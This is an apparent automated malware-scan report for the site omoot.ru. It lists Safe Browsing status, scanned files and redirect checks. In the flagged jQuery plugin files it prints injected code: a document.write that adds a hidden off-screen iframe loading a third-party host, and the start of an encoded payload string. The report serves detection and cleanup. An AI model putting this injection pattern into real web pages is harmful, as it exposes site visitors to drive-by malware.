Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omoot.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://omoot.ru/ | 200 OK Content-Length: 20261 Content-Type: text/html | clean |
http://omoot.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://omoot.ru/components/com_gantry/js/gantry-totop.js | 200 OK Content-Length: 5849 Content-Type: application/x-javascript | malicious |
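Malicious code - confirmed by antivirus engines (see below). Note: the excerpt is truncated by the report. The visible portion is a Dean Edwards-style packed script (the `eval(function(p,a,c,k,e,r)` wrapper) whose word list (window, addEvent, domready, gantry, totop, Fx, Scroll, toTop) matches the template's scroll-to-top handler, so the content that triggered the detection is presumably in the part of the file that is not shown here.
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.1(\'5\',2(){3 a=$(\'6-7\');8(a){3 b=4 9.c(0);a.d(\'f\',\'g\').1(\'h\',2(e){4 i(e).j();b.k()})}});',21,21,'window|addEvent|function|var|new|domready|gantry|totop|if|Fx|||Scroll|setStyle||outline|none|click|Event|stop|toTop'.split('|'),0,{
Antivirus reports: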
| ||
http://omoot.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://omoot.ru/index.php | 200 OK Content-Length: 20276 Content-Type: text/html | clean |
http://omoot.ru/index.php/domains-4-sale | 200 OK Content-Length: 13285 Content-Type: text/html | clean |
http://omoot.ru/indexold.htm | 200 OK Content-Length: 16442 Content-Type: text/html | clean |
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/javascript | clean |
http://omoot.ru/20110105/index.phtml | 500 Internal Server Error Content-Length: 14 Content-Type: text/html | clean |
http://omoot.ru/test404page.js | 404 Not Found Content-Length: 20241 Content-Type: text/html | clean |
http://omoot.ru/index.php/googlelocator | 200 OK Content-Length: 10410 Content-Type: text/html | clean |
http://omoot.ru/index.php/travian2012 | 200 OK Content-Length: 13482 Content-Type: text/html | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://omoot.ru/plugins/content/sigplus/js/jquery.include.min.js | 200 OK Content-Length: 5855 Content-Type: application/x-javascript | malicious |
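Malicious code - confirmed by antivirus engines (see below). Note: the excerpt is truncated by the report. The jQuery version check at the start appears to be the plugin's own loader code; the `document.write('<iframe` call appended after it is the part to examine, and the same appended pattern is shown at greater length for jquery.noconflict.js below.
function __jQuery_version_compare__(){return function(e,f){for(var g=e.split("."),b=f.split("."),a=0;a<b.length;a++){var c=parseInt(g[a]),d=parseInt(b[a]);if(c!=d)return c>d}return true}(jQuery().jquery,"1.4")}if(typeof __jQuery__=="undefined"){if(typeof jQuery!="undefined"&&!__jQuery_version_compare__())var __jQueryOther__=jQuery;if(typeof jQuery=="undefined"||!__jQuery_version_compare__())google.load("jquery","1.4");else var __jQuery__=jQuery}; ;document.write('<iframe wid
Antivirus reports: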
| ||
http://omoot.ru/plugins/content/sigplus/js/jquery.noconflict.js | 200 OK Content-Length: 5611 Content-Type: application/x-javascript | malicious |
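Malicious code - confirmed by antivirus engines (see below). Note: the excerpt is truncated by the report. After the plugin's noConflict block, an appended `document.write` call inserts an iframe that is absolutely positioned off-screen (`left:-100px`) and loads content from a third-party host; it is followed by an encoded string assigned to `OOO`, which is cut off here. Because the same appended pattern shows up in more than one script file, the files were probably modified on the server, so cleanup should compare every script file against a known-good copy rather than only the files flagged in this report.
if (typeof(__jQuery__) == 'undefined') { var __jQuery__ = jQuery.noConflict(); if (typeof(__jQueryOther__) != 'undefined') { jQuery = __jQueryOther__; } };document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://xunur.qhigh.com/geowgjwiehgwvbb.cfg?11"></iframe>'); ;var OOO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKJlUMfhCZslGaDRmblBHch5CbPlkC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVE
Antivirus reports: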
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omoot.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 28 Feb 2015 03:43:13 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 28 Feb 2015 03:43:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a4bf362d653dd69979b263e3fe44028c=5d144442c2def3e7c1a6a5feb980b226; path=/
GET / HTTP/1.1
Host: omoot.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 28 Feb 2015 03:43:13 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 28 Feb 2015 03:43:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a4bf362d653dd69979b263e3fe44028c=5d144442c2def3e7c1a6a5feb980b226; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: omoot.ru
Referer: http://www.google.com/search?q=omoot.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: omoot.ru
Referer: http://www.google.com/search?q=omoot.ru
Result:
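The result is similar to the first query. No suspicious redirects were found. Note that this check only compares a direct visit with a visit carrying a Google search referrer; a redirect that depends on other conditions (user agent, client IP address, cookies) would not be revealed by these two requests, and the injected iframes listed under "Scanned pages/files" load on the page without any HTTP redirect.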